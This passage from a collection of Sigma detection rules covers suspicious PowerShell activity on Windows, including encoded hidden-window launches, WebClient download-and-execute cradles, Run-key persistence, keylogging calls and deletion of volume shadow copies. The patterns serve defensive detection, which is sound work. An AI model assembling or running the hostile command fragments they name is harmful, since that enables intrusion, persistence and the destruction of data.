    "content": "title: Suspicious PowerShell Invocations - Specific\nid: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\n      type: similar\n    - id: 536e2947-3729-478c-9903-745aaffe60d2\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017-03-05\nmodified: 2025-02-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_convert_b64:\n        ScriptBlockText|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex_selection:\n        ScriptBlockText|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc_selection:\n        ScriptBlockText|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg_selection:\n        ScriptBlockText|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n        ScriptBlockText|contains:\n            - '\\software\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\wow6432node\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run'\n    selection_webclient_selection:\n        ScriptBlockText|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        ScriptBlockText|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        ScriptBlockText|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n            - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n            - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml",
    "content": "title: Change User Agents with WebRequest\nid: d4488827-73af-4f8d-9244-7b7662ef046e\nstatus: test\ndescription: |\n    Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\n    Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols\nauthor: frack113\ndate: 2022-01-23\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_webrequest:\n        ScriptBlockText|contains:\n            - 'Invoke-WebRequest'\n            - 'Invoke-RestMethod'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a variable\n            - 'iwr '\n    selection_useragent:\n        ScriptBlockText|contains: '-UserAgent '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml",
    "content": "title: Suspicious IO.FileStream\nid: 70ad982f-67c8-40e0-a955-b920c2fa05cb\nstatus: test\ndescription: Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md\nauthor: frack113\ndate: 2022-01-09\nmodified: 2022-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - New-Object\n            - IO.FileStream\n            - '\\\\\\\\.\\\\'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml",
    "content": "title: Potential Keylogger Activity\nid: 965e2db9-eddb-4cf6-a986-7a967df651e4\nstatus: test\ndescription: Detects PowerShell scripts that contains reference to keystroke capturing functions\nreferences:\n    - https://twitter.com/ScumBots/status/1610626724257046529\n    - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content\n    - https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content\n    - https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: '[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml",
    "content": "title: Potential Suspicious PowerShell Keywords\nid: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf\nstatus: test\ndescription: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework\nreferences:\n    - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1\n    - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1\n    - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7\nauthor: Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)\ndate: 2019-02-11\nmodified: 2023-04-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'System.Reflection.Assembly.Load($'\n            - '[System.Reflection.Assembly]::Load($'\n            - '[Reflection.Assembly]::Load($'\n            - 'System.Reflection.AssemblyName'\n            - 'Reflection.Emit.AssemblyBuilderAccess'\n            - 'Reflection.Emit.CustomAttributeBuilder'\n            - 'Runtime.InteropServices.UnmanagedType'\n            - 'Runtime.InteropServices.DllImportAttribute'\n            - 'SuspendThread'\n            - 'rundll32'\n            # - 'FromBase64'\n            # - 'Invoke-WMIMethod' # Prone to FP\n            # - 'http://127.0.0.1' # Prone to FP\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml",
    "content": "title: Suspicious Get Local Groups Information - PowerShell\nid: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb\nrelated:\n    - id: cef24b90-dddc-4ae1-a09a-8764872f69fc\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of PowerShell modules and cmdlets to gather local group information.\n    Adversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2025-08-22\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_localgroup:\n        ScriptBlockText|contains:\n            - 'get-localgroup '\n            - 'get-localgroupmember '\n    selection_wmi_module:\n        ScriptBlockText|contains:\n            - 'get-wmiobject '\n            - 'gwmi '\n            - 'get-ciminstance '\n            - 'gcim '\n    selection_wmi_class:\n        ScriptBlockText|contains: 'win32_group' # Covers both win32_group and win32_groupuser\n    condition: selection_localgroup or all of selection_wmi_*\nfalsepositives:\n    - Inventory scripts or admin tasks\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml",
    "content": "title: Powershell Local Email Collection\nid: 2837e152-93c8-43d2-85ba-c3cd3c2ae614\nstatus: test\ndescription: |\n    Adversaries may target user email on local systems to collect sensitive information.\n    Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md\nauthor: frack113\ndate: 2021-07-21\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1114.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-Inbox.ps1'\n            - 'Microsoft.Office.Interop.Outlook'\n            - 'Microsoft.Office.Interop.Outlook.olDefaultFolders'\n            - '-comobject outlook.application'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml",
    "content": "title: Suspicious Mount-DiskImage\nid: 29e1c216-6408-489d-8a06-ee9d151ef819\nstatus: test\ndescription: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\n    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Mount-DiskImage '\n            - '-ImagePath '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml",
    "content": "title: PowerShell Deleted Mounted Share\nid: 66a4d409-451b-4151-94f4-a55d559c49b0\nstatus: test\ndescription: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020-10-08\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Remove-SmbShare'\n            - 'Remove-FileShare'\n    filter_main_module_load:\n        ScriptBlockText|contains|all:\n            - 'FileShare.cdxml'\n            - 'Microsoft.PowerShell.Core\\Export-ModuleMember'\n            - 'ROOT/Microsoft/Windows/Storage/MSFT_FileShare'\n            - 'ObjectModelWrapper'\n            - 'Cmdletization.MethodParameter'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators or Power users may remove their shares via cmd line\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml",
    "content": "title: Suspicious Connection to Remote Account\nid: 1883444f-084b-419b-ac62-e0d0c5b3693f\nstatus: test\ndescription: |\n    Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\n    Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos\nauthor: frack113\ndate: 2021-12-27\ntags:\n    - attack.credential-access\n    - attack.t1110.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'System.DirectoryServices.Protocols.LdapDirectoryIdentifier'\n            - 'System.Net.NetworkCredential'\n            - 'System.DirectoryServices.Protocols.LdapConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml",
    "content": "title: Suspicious New-PSDrive to Admin Share\nid: 1c563233-030e-4a07-af8c-ee0490a66d3a\nstatus: test\ndescription: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2\nauthor: frack113\ndate: 2022-08-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-PSDrive'\n            - '-psprovider '\n            - 'filesystem'\n            - '-root '\n            - '\\\\\\\\'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml",
    "content": "title: Suspicious TCP Tunnel Via PowerShell Script\nid: bd33d2aa-497e-4651-9893-5c5364646595\nstatus: test\ndescription: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity\nreferences:\n    - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-08\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[System.Net.HttpWebRequest]'\n            - 'System.Net.Sockets.TcpListener'\n            - 'AcceptTcpClient'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml",
    "content": "title: Recon Information for Export with PowerShell\nid: a9723fcc-881c-424c-8709-fd61442ab3c3\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - 'Get-Service '\n            - 'Get-ChildItem '\n            - 'Get-Process '\n    selection_redirect:\n        ScriptBlockText|contains: '> $env:TEMP\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml",
    "content": "title: Remove Account From Domain Admin Group\nid: 48a45d45-8112-416b-8a67-46e03a4b2107\nstatus: test\ndescription: |\n    Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n    Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Remove-ADGroupMember'\n            - '-Identity '\n            - '-Members '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml",
    "content": "title: Suspicious Service DACL Modification Via Set-Service Cmdlet - PS\nid: 22d80745-6f2c-46da-826b-77adaededd74\nrelated:\n    - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_sddl_flag:\n        ScriptBlockText|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    selection_set_service:\n        ScriptBlockText|contains|all:\n            - 'Set-Service '\n            - 'D;;'\n        ScriptBlockText|contains:\n            - ';;;IU'\n            - ';;;SU'\n            - ';;;BA'\n            - ';;;SY'\n            - ';;;WD'\n    condition: all of selection_*\nfalsepositives:\n    - Rare intended use of hidden services\n    - Rare FP could occur due to the non linearity of the ScriptBlockText log\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml",
    "content": "title: Potential PowerShell Obfuscation Using Alias Cmdlets\nid: 96cd126d-f970-49c4-848a-da3a09f55c55\nrelated:\n    - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8\n      type: derived\nstatus: test\ndescription: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts\nreferences:\n    - https://github.com/1337Rin/Swag-PSO\nauthor: frack113\ndate: 2023-01-08\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Set-Alias '\n            - 'New-Alias '\n    filter_main_cim:\n        ScriptBlockText:\n            - 'Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcls -Value Get-CimClass -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcms -Value Get-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcms -Value Remove-cimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcie -Value Register-CimIndicationEvent -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcai -Value Get-CimAssociatedInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name gcim -Value Get-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name rcim -Value Remove-cimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n            - 'Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml",
    "content": "title: Suspicious Get Information for SMB Share\nid: 95f0643a-ed40-467c-806b-aac9542ec5ab\nstatus: test\ndescription: |\n    Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\n    a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n    Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: get-smbshare\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml",
    "content": "title: Suspicious SSL Connection\nid: 195626f3-5f1b-4403-93b7-e6cfd4d6a078\nstatus: test\ndescription: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2\n    - https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\nauthor: frack113\ndate: 2022-01-23\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - System.Net.Security.SslStream\n            - Net.Security.RemoteCertificateValidationCallback\n            - '.AuthenticateAsClient'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml",
    "content": "title: Suspicious Start-Process PassThru\nid: 0718cd72-f316-4aa2-988f-838ea8533277\nstatus: test\ndescription: Powershell use PassThru option to start in background\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Start-Process\n            - '-PassThru '\n            - '-FilePath '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml",
    "content": "title: Suspicious Unblock-File\nid: 5947497f-1aa4-41dd-9693-c9848d58727d\nstatus: test\ndescription: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2\nauthor: frack113\ndate: 2022-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Unblock-File '\n            - '-Path '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml",
    "content": "title: Replace Desktop Wallpaper by Powershell\nid: c5ac6a1e-9407-45f5-a0ce-ca9a0806a287\nstatus: test\ndescription: |\n    An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\n    This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_1:\n        ScriptBlockText|contains|all:\n            - 'Get-ItemProperty'\n            - 'Registry::'\n            - 'HKEY_CURRENT_USER\\Control Panel\\Desktop\\'\n            - 'WallPaper'\n    selection_2:\n        ScriptBlockText|contains: SystemParametersInfo(20,0,*,3)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml",
    "content": "title: Powershell Suspicious Win32_PnPEntity\nid: b26647de-4feb-4283-af6b-6117661283c5\nstatus: test\ndescription: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md\nauthor: frack113\ndate: 2021-08-23\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1120\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Win32_PnPEntity\n    condition: selection\nfalsepositives:\n    - Admin script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml",
    "content": "title: Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script\nid: c1337eb8-921a-4b59-855b-4ba188ddcc42\nrelated:\n    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e\n      type: derived\n    - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\n      type: similar\nstatus: test\ndescription: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nauthor: Tim Rauch, frack113\ndate: 2022-09-20\nmodified: 2022-12-02\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection_get:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n            - 'Get-CimInstance'\n            - 'gcim'\n    selection_shadowcopy:\n        ScriptBlockText|contains: 'Win32_ShadowCopy'\n    selection_delete:\n        ScriptBlockText|contains:\n            - '.Delete()'\n            - 'Remove-WmiObject'\n            - 'rwmi'\n            - 'Remove-CimInstance'\n            - 'rcim'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml",
    "content": "title: Suspicious PowerShell WindowStyle Option\nid: 313fbb0a-a341-4682-848d-6d6f8c4fab7c\nstatus: test\ndescription: |\n    Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\n    In some cases, windows that would typically be displayed when an application carries out an operation can be hidden\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md\nauthor: frack113, Tim Shelton (fp AWS)\ndate: 2021-10-20\nmodified: 2023-01-03\ntags:\n    - attack.defense-evasion\n    - attack.t1564.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'powershell'\n            - 'WindowStyle'\n            - 'Hidden'\n    filter:\n        ScriptBlockText|contains|all:\n            - ':\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n            - '$PSScriptRoot\\Module\\WorkspaceScriptModule\\WorkspaceScriptModule'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml",
